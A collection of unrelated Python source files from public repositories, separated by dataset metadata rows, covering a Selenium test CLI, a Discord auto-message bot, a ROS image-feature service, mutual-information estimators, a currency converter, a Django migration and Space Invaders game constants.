def main(args=sys.argv[1:]):
parser = argparse.ArgumentParser(prog="Salad",
description=("BDD browswer-automation "
"made tasty."))
parser.add_argument('--browser', default=DEFAULT_BROWSER,
action=store_driver_and_version, metavar='BROWSER',
help=('Browser to use. Options: %s Default is %s.' %
(BROWSER_CHOICES, DEFAULT_BROWSER)))
parser.add_argument('--remote-url',
help='Selenium server url for remote browsers')
parser.add_argument('--name',
help=('Give your job a name so it '
'can be identified on saucelabs'))
parser.add_argument('--timeout',
help=("Set the saucelabs' idle-timeout for the job"))
(parsed_args, leftovers) = parser.parse_known_args()
world.drivers = [parsed_args.browser]
world.remote_url = parsed_args.remote_url
world.remote_capabilities = {}
if 'version' in parsed_args:
world.remote_capabilities['version'] = parsed_args.version
if 'platform' in parsed_args:
world.remote_capabilities['platform'] = parsed_args.platform
name = _get_current_timestamp() + " - "
if not parsed_args.name:
name += "unnamed job"
else:
name += parsed_args.name
world.remote_capabilities['name'] = name
if not parsed_args.timeout:
world.remote_capabilities['idle-timeout'] = 120
else:
world.remote_capabilities['idle-timeout'] = parsed_args.timeout
lettuce_main(args=leftovers)
def _get_current_timestamp():
from time import strftime
import datetime
return datetime.datetime.strftime(datetime.datetime.now(),
'%d.%m.%Y %H:%M')
if __name__ == '__main__':
main()
| salad/salad | salad/cli.py | cli.py | py | 3,130 | python | en | code | 122 | github-code | 36 |
39671693100 | import discord
from discord.ext import commands
import time
import json
import os
if not os.path.isfile('config.json'):
exit
f = open('config.json')
data = json.load(f)
TOKEN = data['token']
servers = data['servers']
message = data['message']
delay = int(data['delay'])
for i in range(len(servers)):
servers[i] = int(servers[i])
bot = discord.Client(token=TOKEN)
@bot.event
async def on_guild_channel_create(channel):
if channel.guild.id in servers:
print(channel, "had just been created")
time.sleep(delay)
await channel.send(message)
bot.run(TOKEN) | skiteskopes/discord_channel_create_auto_messager | discord_bot.py | discord_bot.py | py | 593 | python | en | code | 0 | github-code | 36 |
2962922987 | #! /usr/bin/env python
from sensor_msgs.msg import CompressedImage
from cv_bridge import CvBridge, CvBridgeError
import cv2
import rospy
import subprocess
#from PIL import Image # PIL
from __init__ import *
from rgiro_spco2_slam.srv import spco_data_image,spco_data_imageResponse
import spco2_placescnn as places365
class ImageFeatureServer():
def image_server(self, req):
if len(self.frame) == 0:
return spco_data_imageResponse(False)
#cv2.imshow("image", self.frame)
# forward pass
convert_img = places365.Image.fromarray(self.frame)#convert into PIL
input_img = places365.V(self.tf(convert_img).unsqueeze(0))
logit = self.model.forward(input_img)
h_x = places365.F.softmax(logit, 1).data.squeeze()
# save image feature
fp = open(self.DATA_FOLDER + '/img/ft' + str(req.count) + '.csv','a')
h_x_numpy = h_x.to('cpu').detach().numpy().copy()
fp.write(','.join(map(str, h_x_numpy)))
fp.write('\n')
fp.close()
rospy.loginfo("[Service] save new feature")
# save image
if self.image_save:
if req.mode == "new":
p = subprocess.Popen("mkdir " + self.DATA_FOLDER + "/image/", shell=True)
rospy.sleep(0.5)
image_name = self.DATA_FOLDER + "/image/" + str(req.count) + ".jpg"
cv2.imwrite(image_name, self.frame)
rospy.loginfo("[Service spco_data/image] save new image as %s", image_name)
# save and publish activation image
#print "h_x",h_x
probs, idx = h_x.sort(0, True)
probs = probs.numpy()
idx = idx.numpy()
# generate class activation mapping
#print('Class activation map is saved as cam.jpg')
#CAMs = places365.returnCAM(features_blobs[0], weight_softmax, [idx[0]])
# render the CAM and output
#img = cv2.imread('test.jpg')
'''
height, width, _ = self.frame.shape# img.shape
heatmap = cv2.applyColorMap(cv2.resize(CAMs[0],(width, height)), cv2.COLORMAP_JET)
result = heatmap * 0.4 + img * 0.5
image_name = self.DATA_FOLDER + "/image/" + str(req.count) + "_activation.jpg"
cv2.imwrite(image_name, result)
'''
return spco_data_imageResponse(True)
def image_callback(self, image):
try:
self.frame = CvBridge().compressed_imgmsg_to_cv2(image)
except CvBrideError as e:
print (e)
def load_network_model(self):
# load the labels
self.classes, self.labels_IO, self.labels_attribute, self.W_attribute = places365.load_labels()
# load the model
self.model = places365.load_model()
# load the transformer
self.tf = places365.returnTF() # image transformer
# get the softmax weight
self.params = list(self.model.parameters())
self.weight_softmax = self.params[-2].data.numpy()
self.weight_softmax[self.weight_softmax<0] = 0
return (True)
def __init__(self):
TRIALNAME = "test"#rospy.get_param('~trial_name')#test
IMAGE_TOPIC = '/hsrb/head_rgbd_sensor/rgb/image_rect_color/compressed' #"/hsrb/head_rgbd_sensor/rgb/image_raw"#rospy.get_param('~image_topic')#/camera/rgb/image_raw
self.image_save = True #rospy.get_param('~image_save')#true
# subscrib image
rospy.Subscriber(IMAGE_TOPIC, CompressedImage, self.image_callback, queue_size=1)
if self.load_network_model()==False:
print ("error")
self.DATA_FOLDER = datafolder + TRIALNAME
self.frame = []
s = rospy.Service('rgiro_spco2_slam/image', spco_data_image, self.image_server)
rospy.loginfo("[Service spco_data/image] Ready")
if __name__ == "__main__":
rospy.init_node('spco2_image_features',anonymous=False)
srv = ImageFeatureServer()
rospy.spin()
| Shoichi-Hasegawa0628/spco2_boo | rgiro_spco2_slam/src/spco2_image_features.py | spco2_image_features.py | py | 3,939 | python | en | code | 2 | github-code | 36 |
70345443943 | import numpy as np
import math
import torch
import torch.nn as nn
class Upper(nn.Module): # Upper: Mutual Information Contrastive Learning Upper Bound
'''
This class provides the Upper bound estimation to I(X,Y)
Method:
forward() : provides the estimation with input samples
loglikeli() : provides the log-likelihood of the approximation q(Y|X) with input samples
Arguments:
x_dim, y_dim : the dimensions of samples from X, Y respectively
hidden_size : the dimension of the hidden layer of the approximation network q(Y|X)
x_samples, y_samples : samples from X and Y, having shape [sample_size, x_dim/y_dim]
'''
def __init__(self, x_dim, y_dim, hidden_size):
super(Upper, self).__init__()
# p_mu outputs mean of q(Y|X)
self.p_mu = nn.Sequential(nn.Linear(x_dim, hidden_size//2),
nn.ReLU(),
nn.Linear(hidden_size//2, y_dim))
# p_logvar outputs log of variance of q(Y|X)
self.p_logvar = nn.Sequential(nn.Linear(x_dim, hidden_size//2),
nn.ReLU(),
nn.Linear(hidden_size//2, y_dim),
nn.Tanh())
def get_mu_logvar(self, x_samples):
mu = self.p_mu(x_samples)
logvar = self.p_logvar(x_samples)
return mu, logvar
def forward(self, x_samples, y_samples):
mu, logvar = self.get_mu_logvar(x_samples)
# log of conditional probability of positive sample pairs
positive = - (mu - y_samples)**2 /2./logvar.exp()
prediction_1 = mu.unsqueeze(1) # shape [nsample,1,dim]
y_samples_1 = y_samples.unsqueeze(0) # shape [1,nsample,dim]
# log of conditional probability of negative sample pairs
negative = - ((y_samples_1 - prediction_1)**2).mean(dim=1)/2./logvar.exp()
return (positive.sum(dim = -1) - negative.sum(dim = -1)).mean()
def loglikeli(self, x_samples, y_samples): # unnormalized loglikelihood
mu, logvar = self.get_mu_logvar(x_samples)
return (-(mu - y_samples)**2 /logvar.exp()-logvar).sum(dim=1).mean(dim=0)
def learning_loss(self, x_samples, y_samples):
return - self.loglikeli(x_samples, y_samples)
class Lower(nn.Module):
def __init__(self, x_dim, y_dim, hidden_size):
super(Lower, self).__init__()
self.F_func = nn.Sequential(nn.Linear(x_dim + y_dim, hidden_size),
nn.ReLU(),
nn.Linear(hidden_size, 1))
def forward(self, x_samples, y_samples):
# shuffle and concatenate
sample_size = y_samples.shape[0]
x_tile = x_samples.unsqueeze(0).repeat((sample_size, 1, 1))
y_tile = y_samples.unsqueeze(1).repeat((1, sample_size, 1))
T0 = self.F_func(torch.cat([x_samples,y_samples], dim = -1))
T1 = self.F_func(torch.cat([x_tile, y_tile], dim = -1))-1. #shape [sample_size, sample_size, 1]
lower_bound = T0.mean() - (T1.logsumexp(dim = 1) - np.log(sample_size)).exp().mean()
return lower_bound
def learning_loss(self, x_samples, y_samples):
return -self.forward(x_samples, y_samples)
| joey-wang123/Semi-meta | mi_estimators.py | mi_estimators.py | py | 3,452 | python | en | code | 0 | github-code | 36 |
20504076743 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
# @Filename : kalao_pump_switch.sh
# @Date : 2023-01-12-14-12
# @Project: KalAO-ICS
# @AUTHOR : Janis Hagelberg
"""
kalao_pump_switch.py is part of the KalAO Instrument Control Software it is a maintenance script used to switch
the water cooling pump from on to off and opposite.
(KalAO-ICS).
"""
from kalao.plc import temperature_control
import argparse
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('--on', help='Turn pump ON', action='store_true')
parser.add_argument('--off', dest='on', action='store_false')
parser.set_defaults(feature=False)
args = parser.parse_args()
#if temperature_control.pump_status() == 'ON':
if args.on:
print("Switching pump ON")
temperature_control.pump_on()
else:
print("Switching pump OFF")
temperature_control.pump_off()
| janis-hag/kalao-ics | scripts/kalao_pump_switch.py | kalao_pump_switch.py | py | 907 | python | en | code | 0 | github-code | 36 |
26166182256 | from State import State
class Parser:
@staticmethod
def parse_state_space_file(file_path):
'''Parses state space file
Args:
file_path (string): String to state space file.
Returns:
tuple: (start_state, final_state, transition)
'''
state_space_file = open(file_path)
line_num = -1
start_state = final_state = None
transition = {}
for line in state_space_file:
if line.strip()[0] == '#':
continue
line_num += 1
if line_num == 0:
start_state = line.strip()
elif line_num == 1:
final_state = line.strip().split(' ')
else:
splited = line.strip().split(':')
begin_state = splited[0]
if splited[1] == '':
continue
else:
finish_states = splited[1].strip().split(" ")
for state in finish_states:
if begin_state not in transition:
transition[begin_state] = []
state_split = state.split(',')
s = State(state_split[0], float(state_split[1]))
transition[begin_state].append(s)
transition[begin_state] = sorted(transition[begin_state], key=lambda p: p.state)
state_space_file.close()
return (start_state, final_state, transition)
@staticmethod
def parse_heuristic_value_file(file_path):
"""Parses heuristic value file
Args:
file_path (string): String to state space file.
Returns:
dictioniary: Heuristics dictioniary
"""
heuristics_file = open(file_path)
heuristics = {}
for line in heuristics_file:
if line[1] == '#':
continue
strip = line.strip().split(":")
heuristics[strip[0]] = float(strip[1].strip())
heuristics_file.close()
return heuristics
@staticmethod
def parse_args(args):
"""Parses arguments of solution.py
Args:
args (list): List of arguments passed into solution.py.
Returns:
tuple: (alg, ss, h, optimistic, consistent)
"""
alg = ss = h = optimistic = consistent = None
flag = None
for arg in args:
if '--' in arg:
flag = arg
if flag == '--check-optimistic':
optimistic = True
elif flag == '--check-consistent':
consistent = True
else:
if flag == '--alg':
alg = arg
elif flag == '--ss':
ss = arg
elif flag == '--h':
h = arg
return (alg, ss, h, optimistic, consistent) | dinogrgic1/fer-artificial-intelligence-labs | lab1py/Parser.py | Parser.py | py | 2,926 | python | en | code | 0 | github-code | 36 |
73387258343 | from datetime import datetime
from __init__ import db
from flask_login import UserMixin
from sqlalchemy.sql import func
class OrganizerEvent(db.Model):
id = db.Column(db.Integer, primary_key=True)
organizer_id = db.Column(db.Integer, db.ForeignKey('user.id'), nullable=False)
event_id = db.Column(db.Integer, db.ForeignKey('event.id'), nullable=False)
class User(db.Model,UserMixin):
id = db.Column(db.Integer, primary_key=True)
firstname = db.Column(db.String(50), nullable=False)
email = db.Column(db.String(120), unique=True, nullable=False)
password = db.Column(db.String(255), nullable=False)
is_organizer = db.Column(db.Boolean, default=False)
tickets = db.relationship('Ticket', backref='attendee', lazy=True)
class Event(db.Model):
id = db.Column(db.Integer, primary_key=True)
title = db.Column(db.String(100), nullable=False)
description = db.Column(db.String(500), nullable=False)
venue = db.Column(db.String(100), nullable=False)
date = db.Column(db.DateTime(timezone=True), default=func.now())
capacity = db.Column(db.Integer, nullable=False)
tickets = db.relationship('Ticket', backref='event', lazy=True)
class Ticket(db.Model):
id = db.Column(db.Integer, primary_key=True)
barcode = db.Column(db.String(25), nullable=False, unique=True)
attendee_id = db.Column(db.Integer, db.ForeignKey('user.id'), nullable=False)
event_id = db.Column(db.Integer, db.ForeignKey('event.id'), nullable=False)
| ntoghrul/Evento | models.py | models.py | py | 1,496 | python | en | code | 0 | github-code | 36 |
23420924440 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('ventas', '0048_auto_20160928_0742'),
]
operations = [
migrations.AlterField(
model_name='comanda',
name='area_encargada',
field=models.CharField(max_length=3, verbose_name=b'Area Encargada', choices=[(b'COC', b'Cocina'), (b'BAR', b'Barra')]),
),
migrations.AlterField(
model_name='comanda',
name='estado_comanda',
field=models.CharField(max_length=3, verbose_name=b'Estado Comanda', choices=[(b'PEN', b'Pendiente'), (b'PRO', b'Procesada'), (b'CAN', b'Cancelada')]),
),
migrations.AlterField(
model_name='comanda',
name='fecha_hora_pedido_comanda',
field=models.DateTimeField(verbose_name=b'Fecha/hora Pedido Comanda'),
),
migrations.AlterField(
model_name='comanda',
name='fecha_hora_procesamiento_comanda',
field=models.DateTimeField(null=True, verbose_name=b'Fecha/hora Procesamiento Comanda', blank=True),
),
migrations.AlterField(
model_name='comanda',
name='producto_a_elaborar',
field=models.ForeignKey(verbose_name=b'Producto a Elaborar', to='stock.ProductoCompuesto'),
),
migrations.AlterField(
model_name='venta',
name='apertura_caja',
field=models.ForeignKey(default=1, verbose_name=b'Apertura de Caja', to='ventas.AperturaCaja', help_text=b'Se asigna dependiendo del usuario logueado y de si posee una Apertura de Caja vigente.'),
),
migrations.AlterField(
model_name='venta',
name='numero_factura_venta',
field=models.ForeignKey(related_name='numero_factura', default=1, verbose_name=b'Numero de Factura de la Venta', to='bar.FacturaVenta', help_text=b'El Numero de Factura se asigna al momento de confirmarse la Venta.'),
),
]
| pmmrpy/SIGB | ventas/migrations/0049_auto_20160930_1114.py | 0049_auto_20160930_1114.py | py | 2,096 | python | es | code | 0 | github-code | 36 |
6035944019 | import matplotlib.pyplot as plt
import pdb
import numpy as np
import csv
import time
def PlotDemo1(a, b):
a1 = []
b1 = []
a1 = a
b1 = b
fig = plt.figure()
ax = fig.add_subplot(1,1,1)
ax.plot(a,b)
plt.show()
def PlotDemo(a,zero):
a1 = []
b1 = []
a1 = a
fig = plt.figure()
ax = fig.add_subplot(1,1,1)
ax.plot(a)
ax.plot(zero)
plt.show()
def Run(symbol):
csv_reader = csv.reader(open("E:/MyGit/PythonStock/获取当数据并画分时图/data/"+time.strftime('%Y%m%d')+"/"+symbol+".csv",'r', encoding='utf-8'))
#pdb.set_trace()
PICES1 = [row[4] for row in csv_reader]
csv_reader1 = csv.reader(open("E:/MyGit/PythonStock/获取当数据并画分时图/data/"+time.strftime('%Y%m%d')+"/"+symbol+".csv",'r', encoding='utf-8'))
TIME1 = [row[10] for row in csv_reader1]
csv_reader2 = csv.reader(open("E:/MyGit/PythonStock/获取当数据并画分时图/data/"+time.strftime('%Y%m%d')+"/"+symbol+".csv",'r', encoding='utf-8'))
yesterday = [row[3] for row in csv_reader2][2]
TIME2 = [row[4] for row in csv_reader]
PICES3 = [row[5] for row in csv_reader]
TIME3 = [row[6] for row in csv_reader]
PICES4 = [row[7] for row in csv_reader]
TIME4 = [row[8] for row in csv_reader]
PICES5 = [row[9] for row in csv_reader]
TIME5 = [row[10] for row in csv_reader]
print(PICES1)
print(TIME1)
print( yesterday)
print(TIME2)
print(PICES3)
print(TIME3)
print(PICES4)
print(TIME4)
print(PICES5)
print(TIME5)
#PlotDemo1()
#res = [x-1 for x in PICES1]
a = PICES1.remove('当前价格')
b = TIME1.remove('时间')
print(PICES1)
res = list(map(float,PICES1))
res = [x-float(yesterday) for x in res]
res = [x/float(yesterday)*100 for x in res]
zero = [0 for i in range(len(res))]
print(zero)
print(TIME1)
PlotDemo(res,zero)
if __name__ == '__main__':
Run("300736")
| 2017wxyzwxyz/PythonStock | 获取当日数据并画分时图/画出走势图.py | 画出走势图.py | py | 1,976 | python | en | code | 0 | github-code | 36 |
9587889867 | import os
import csv
from decimal import Decimal
from forex_python.bitcoin import BtcConverter
from forex_python.converter import CurrencyRates
from plugin import plugin, require
FILE_PATH = os.path.abspath(os.path.dirname(__file__))
@require(network=True)
@plugin('currencyconv')
class Currencyconv():
"""
Convert an amount of money from a currency to another.
-- Type currencyconv, press enter and follow the instructions!
"""
def __call__(self, jarvis, s):
currencies = self.find_currencies()
amount = jarvis.input_number('Enter an amount: ')
from_currency = self.get_currency(jarvis, 'Enter from which currency: ', currencies)
to_currency = self.get_currency(jarvis, 'Enter to which currency: ', currencies)
self.currencyconv(jarvis, amount, from_currency, to_currency)
def currencyconv(self, jarvis, amount, fr, to):
"""
currencyconv converts the given amount to another currency
using fore-python
"""
b = BtcConverter(force_decimal=True)
c = CurrencyRates(force_decimal=True)
if (to == "BTC"):
result = b.convert_to_btc(Decimal(amount), fr)
elif (fr == "BTC"):
result = b.convert_btc_to_cur(Decimal(amount), to)
else:
result = c.convert(fr, to, Decimal(amount))
outputText = str(amount) + " " + fr + \
" are equal to " + str(result) + " " + to
jarvis.say(outputText)
def find_currencies(self):
"""
find_currency creates a dict with the inputs that forex-python accepts
"""
with open(os.path.join(FILE_PATH, "../data/currencies.csv"), mode='r') as infile:
reader = csv.reader(infile)
mydict = {r.upper(): row[2] for row in reader for r in row[0:3]}
return mydict
def get_currency(self, jarvis, prompt, currencies):
"""
get_currency checks if the input the user gave is valid based
on the dictionary of find_currencies
"""
while True:
c = jarvis.input(prompt).upper()
if c in currencies:
return currencies[c]
elif c == "show help".upper():
print(', '.join(set(currencies.values())))
prompt = 'Please enter a valid country or currency: '
continue
elif c == "try again".upper():
prompt = 'Please enter a valid country or currency: '
continue
else:
prompt = 'Type -show help- to see valid currencies '\
'or -try again- to continue: '
| sukeesh/Jarvis | jarviscli/plugins/currency_conv.py | currency_conv.py | py | 2,657 | python | en | code | 2,765 | github-code | 36 |
11341872181 | with open('2022/3/input.txt') as file:
sacks = [sack.strip() for sack in file.readlines()]
priority = 'abcdefghijklmnopqrstuvwxyz'
priority += priority.upper()
priorities = []
for i in range(len(sacks) // 3):
group_sacks = sacks[3*i:3*i+3]
sack1 = group_sacks[0]
for item in sack1:
if item in group_sacks[1] and item in group_sacks[2]:
common = item
priorities.append(priority.index(common)+1)
print(sum(priorities))
| jimenezj8/advent_of_code | 2022/3/part2.py | part2.py | py | 460 | python | en | code | 0 | github-code | 36 |
16486666559 | # -*- coding: utf-8 -*-
from plone.app.contenttypes.testing import PLONE_APP_CONTENTTYPES_FIXTURE
from plone.app.robotframework.testing import REMOTE_LIBRARY_BUNDLE_FIXTURE
from plone.app.testing import applyProfile
from plone.app.testing import FunctionalTesting
from plone.app.testing import IntegrationTesting
from plone.app.testing import PloneSandboxLayer
from plone.testing import z2
import polklibrary.linkchecker
class PolklibraryLinkcheckerLayer(PloneSandboxLayer):
defaultBases = (PLONE_APP_CONTENTTYPES_FIXTURE,)
def setUpZope(self, app, configurationContext):
# Load any other ZCML that is required for your tests.
# The z3c.autoinclude feature is disabled in the Plone fixture base
# layer.
import plone.restapi
self.loadZCML(package=plone.restapi)
self.loadZCML(package=polklibrary.linkchecker)
def setUpPloneSite(self, portal):
applyProfile(portal, 'polklibrary.linkchecker:default')
POLKLIBRARY_LINKCHECKER_FIXTURE = PolklibraryLinkcheckerLayer()
POLKLIBRARY_LINKCHECKER_INTEGRATION_TESTING = IntegrationTesting(
bases=(POLKLIBRARY_LINKCHECKER_FIXTURE,),
name='PolklibraryLinkcheckerLayer:IntegrationTesting',
)
POLKLIBRARY_LINKCHECKER_FUNCTIONAL_TESTING = FunctionalTesting(
bases=(POLKLIBRARY_LINKCHECKER_FIXTURE,),
name='PolklibraryLinkcheckerLayer:FunctionalTesting',
)
POLKLIBRARY_LINKCHECKER_ACCEPTANCE_TESTING = FunctionalTesting(
bases=(
POLKLIBRARY_LINKCHECKER_FIXTURE,
REMOTE_LIBRARY_BUNDLE_FIXTURE,
z2.ZSERVER_FIXTURE,
),
name='PolklibraryLinkcheckerLayer:AcceptanceTesting',
)
| polklibrary/polklibrary.linkchecker | polklibrary.linkchecker/src/polklibrary/linkchecker/testing.py | testing.py | py | 1,639 | python | en | code | 0 | github-code | 36 |
37001010150 | def merge(s,e):
global cnt
if s == e:
return
mid = (s+e-1)//2
merge(s, mid)
merge(mid+1, e)
if arr[mid] > arr[e]:
cnt += 1
i, j, k = s, mid+1, s
while i <= mid and j <= e:
if arr[i] <= arr[j]:
temp[k] = arr[i]
i, k = i + 1, k + 1
else:
temp[k] = arr[j]
j, k = j + 1, k + 1
while i <= mid:
temp[k] = arr[i]
i, k = i + 1, k + 1
while j <= e:
temp[k] = arr[j]
j, k = j + 1, k + 1
for l in range(s, e+1):
arr[l] = temp[l]
for tc in range(1, int(input())+1):
N = int(input())
arr = list(map(int, input().split()))
temp = [0] * N
cnt = 0
merge(0,N-1)
print(f'#{tc} {arr[N//2]} {cnt}') | ejuun/SWEA | swea0329_11891(분할정복_병합정렬).py | swea0329_11891(분할정복_병합정렬).py | py | 776 | python | en | code | 0 | github-code | 36 |
30526696470 | from __future__ import print_function, division
import os
import logging
import math
import numpy as np
import pandas as pd
import torch
from torch.utils.tensorboard import SummaryWriter
IS_ON_SERVER = False if os.getcwd().startswith('/home/SENSETIME/yuanjing1') else True
axis_name2np_dim = {
"x": 2,
"y": 1,
"z": 0,
}
# --------
# data normalization
def mean_std_norm(array):
return (array - array.mean()) / (array.std() + 1e-10)
def rescale01(arr):
return (arr - arr.min()) / (arr.max() - arr.min())
def window_rescale(arr, a_min=None, a_max=None):
arr = np.clip(arr, a_min=a_min, a_max=a_max)
return (arr - a_min) / (a_max - a_min)
def auto_window(arr):
return window_rescale(arr, a_min=np.percentile(arr, 1), a_max=np.percentile(arr, 99))
# --------
# pad & crop
def get_pad_border(origin_shape, target_shape):
assert len(origin_shape) == len(target_shape), 'Dimension mismatch.'
borders = []
for i in range(len(origin_shape)):
tmp = target_shape[i] - origin_shape[i]
borders.extend((tmp // 2, tmp - tmp // 2))
return tuple(zip(borders[::2], borders[1::2]))
def pad_zyx_constant(nda, target_shape, pad_value=0, strict=False):
assert nda.ndim == len(target_shape), 'Dimension mismatch.'
if strict:
assert np.all(np.array(target_shape) >= np.array(nda.shape)), 'Target shape must be larger than input shape.'
else:
target_shape = np.maximum(nda.shape, target_shape)
borders = get_pad_border(nda.shape, target_shape)
nda = np.pad(nda, borders, mode='constant', constant_values=pad_value)
return nda
def center_crop_zyx(nda, target_shape):
starts = np.asarray((np.asarray(nda.shape) - np.asarray(target_shape)) // 2)
slice_fn = tuple(map(slice, starts, np.asarray(starts) + np.asarray(target_shape)))
return nda[slice_fn]
def constant_pad_crop(nda, target_shape, pad_value=0, strict=False):
assert nda.ndim == len(target_shape), 'Dimension mismatch.'
nda = pad_zyx_constant(nda, target_shape, pad_value, strict)
return center_crop_zyx(nda, target_shape)
# --------
# logger
def log_init(log_dir):
logger = logging.getLogger()
logger.setLevel(level=logging.DEBUG)
formatter = logging.Formatter('%(asctime)s - %(levelname)s - %(lineno)d - %(module)s - %(message)s')
# handle for txt file
f_handler = logging.FileHandler(os.path.join(log_dir, 'log.txt'))
f_handler.setLevel(logging.INFO)
f_handler.setFormatter(formatter)
# handle for screen
c_handler = logging.StreamHandler()
c_handler.setLevel(logging.INFO)
c_handler.setFormatter(formatter)
logger.addHandler(f_handler)
logger.addHandler(c_handler)
writer = SummaryWriter(log_dir=os.path.join(log_dir, 'tb'))
return logger, writer
# --------
def get_bbox(np_lbl):
lbl_indices = np.nonzero(np_lbl)
bbox = np.array([[i.min(), i.max()] for i in lbl_indices])
return bbox
def hist_match(source, template):
oldshape = source.shape
source = source.ravel()
template = template.ravel()
# get the set of unique pixel values and their corresponding indices and counts
s_values, bin_idx, s_counts = np.unique(source, return_inverse=True, return_counts=True)
t_values, t_counts = np.unique(template, return_counts=True)
s_quantiles = np.cumsum(s_counts).astype(np.float64)
s_quantiles /= s_quantiles[-1]
t_quantiles = np.cumsum(t_counts).astype(np.float64)
t_quantiles /= t_quantiles[-1]
interp_t_values = np.interp(s_quantiles, t_quantiles, t_values)
return interp_t_values[bin_idx].reshape(oldshape)
def make_one_hot(labels, num_classes):
r"""
Convert int labels to one-hot encoding labels
:param labels: N x H x W or N x D x H x W shape torch.LongTensor
:param num_classes: class number control output channel C
:return: N x C x H x W or N x C x D x H x W
"""
labels = torch.unsqueeze(labels, dim=1)
one_hot_shape = list(labels.size())
one_hot_shape[1] = num_classes
one_hot = torch.zeros(one_hot_shape).long().to(labels.device)
return one_hot.scatter_(dim=1, index=labels, value=1)
def save_csv(cfg, file_list, file_name):
df = pd.DataFrame(np.array(file_list), columns=['file names'])
df.to_csv(os.path.join(cfg.save_dir, file_name), index=False)
def train_val_test_split(data_list, train_control, val_control, data_stratify=None, random_seed=None):
def _split_one_group(data_list, train_num, val_num, random_seed=None):
data_length = len(data_list)
if random_seed is not None:
np.random.seed(random_seed)
ids_seq = np.random.permutation(data_length)
return data_list[ids_seq[0:train_num]], \
data_list[ids_seq[train_num:train_num + val_num]], \
data_list[ids_seq[train_num + val_num:]]
data_length = len(data_list)
if type(data_list) != np.ndarray:
data_list = np.array(data_list)
train_num = int(math.ceil(train_control * data_length)) if isinstance(train_control, float) else train_control
val_num = int(math.floor(val_control * data_length)) if isinstance(val_control, float) else val_control
if data_stratify is None:
train_list, val_list, test_list = _split_one_group(data_list, train_num, val_num, random_seed)
else:
if type(data_stratify) != np.ndarray:
data_stratify = np.array(data_stratify)
classes, classes_counts = np.unique(data_stratify, return_counts=True)
train_ratio = train_control if isinstance(train_control, float) else train_num / data_length
val_ratio = val_control if isinstance(val_control, float) else val_num / data_length
train_nums = []
val_nums = []
for i in range(len(classes)):
if i != len(classes) - 1:
train_nums.append(int(math.ceil(train_ratio * classes_counts[i])))
val_nums.append(int(math.floor(val_ratio * classes_counts[i])))
else:
train_nums.append(train_num - np.asarray(train_nums).sum())
val_nums.append(val_num - np.asarray(val_nums).sum())
train_list = np.array([])
val_list = np.array([])
test_list = np.array([])
for i, (t, v) in enumerate(zip(train_nums, val_nums)):
tmp_train_list, tmp_val_list, tmp_test_list = \
_split_one_group(data_list[data_stratify == classes[i]], t, v,
random_seed + i * 10 if random_seed is not None else random_seed)
train_list = np.concatenate((train_list, tmp_train_list))
val_list = np.concatenate((val_list, tmp_val_list))
test_list = np.concatenate((test_list, tmp_test_list))
return train_list.tolist(), val_list.tolist(), test_list.tolist()
| eugeneyuan/test_rep | src/utils/miscs.py | miscs.py | py | 6,820 | python | en | code | 0 | github-code | 36 |
19680151162 | import unittest
import tonal
import mingus.core.notes
from scales import SCALE_NAMES, TonalScale
import mingus.core.scales as scales
notes = mingus.core.notes
to = tonal.Tonal()
ts = TonalScale()
class TestTonal(unittest.TestCase):
def test_scale_octave(self):
self.assertEqual(12, to.add_octave(0, 1))
def test_to_int(self):
self.assertEqual(0, to.note_to_int("C"))
self.assertEqual(11, notes.note_to_int("Cb"))
with self.assertRaises(TypeError):
to.note_to_int(0)
def test_pick_scale(self):
self.assertIsNotNone(to.pick_scale())
self.assertIn(to.pick_scale(), SCALE_NAMES)
def test_pick_base_note(self):
self.assertIn(notes.note_to_int(to.pick_base_note()), range(0, 13))
class TestScales(unittest.TestCase):
def test_select_scale(self):
self.assertIsInstance(
ts.select_scale("HarmonicMajor", "C"),
scales.HarmonicMajor
)
| gabelev/machine_music | tonal_test.py | tonal_test.py | py | 964 | python | en | code | 28 | github-code | 36 |
8733726032 | import pygame
pygame.init()
__screen_info = pygame.display.Info()
__height = __screen_info.current_h
# Screen constants
SCREEN_SIZE = (__height / 7 * 6, __height - 64)
ICON_SIZE = (64, 64)
LEFT_BOUND = 0
RIGHT_BOUND = SCREEN_SIZE[0] - ICON_SIZE[0]
TOP_BOUND = 0
BOTTOM_BOUND = SCREEN_SIZE[1]
ALIEN_INVASION_BOUND = SCREEN_SIZE[1] / 6 * 5 - ICON_SIZE[1]
# Player constants
INITIAL_PLAYER_COORDINATES = (SCREEN_SIZE[0] / 2 - ICON_SIZE[0] / 2,
SCREEN_SIZE[1] / 6 * 5)
PLAYER_BODY_LEFT_PAD = 6
PLAYER_BODY_TOP_PAD = 17
PLAYER_WIDTH = 52
PLAYER_HEIGHT = 31
# Num pixels the player moves left or right with each key pressed
PLAYER_SPEED = SCREEN_SIZE[0] * 9 / 800
# PlayerBullet constants
PLAYER_BULLET_SPEED = SCREEN_SIZE[1] / 100 * 3
PLAYER_BULLET_BODY_LEFT_PAD = 30
PLAYER_BULLET_BODY_TOP_PAD = 0
PLAYER_BULLET_WIDTH = 4
PLAYER_BULLET_HEIGHT = 17
# Alien constants
INITIAL_ALIEN_COORDINATES = (ICON_SIZE[0], SCREEN_SIZE[1] / 10 + ICON_SIZE[1])
ALIEN_BODY_LEFT_PAD = 2
ALIEN_BODY_TOP_PAD = 7
ALIEN_WIDTH = 60
ALIEN_HEIGHT = 48
NUM_ALIENS_PER_ROW = 8
BASE_NUM_ALIEN_ROWS = 3
MAX_NUM_ALIEN_ROWS = 5
ALIEN_HORIZONTAL_GAP = (
SCREEN_SIZE[0] - 2 * INITIAL_ALIEN_COORDINATES[0] - ICON_SIZE[0]) / (NUM_ALIENS_PER_ROW - 1)
ALIEN_VERTICAL_GAP = SCREEN_SIZE[1] / 15
BASE_ALIEN_MOVES_PER_SECOND = 0.4
# Num pixels alien traverses each time it moves
ALIEN_SPEED = SCREEN_SIZE[0] / 80
# Alien bullet constants
BASE_ALIEN_BULLET_SPEED = SCREEN_SIZE[1] / 100
BASE_ALIEN_CHANCE_TO_FIRE = 1 / 1_000
ALIEN_BULLET_BODY_LEFT_PAD = 26
ALIEN_BULLET_BODY_TOP_PAD = 36
ALIEN_BULLET_WIDTH = 12
ALIEN_BULLET_HEIGHT = 28
# UFO constants
INITIAL_UFO_COORDINATES = (0, 0)
BASE_UFO_SPEED = SCREEN_SIZE[0] / 160
UFO_WIDTH = 80
UFO_HEIGHT = 24
UFO_CHANCE_TO_APPEAR = 1 / 400
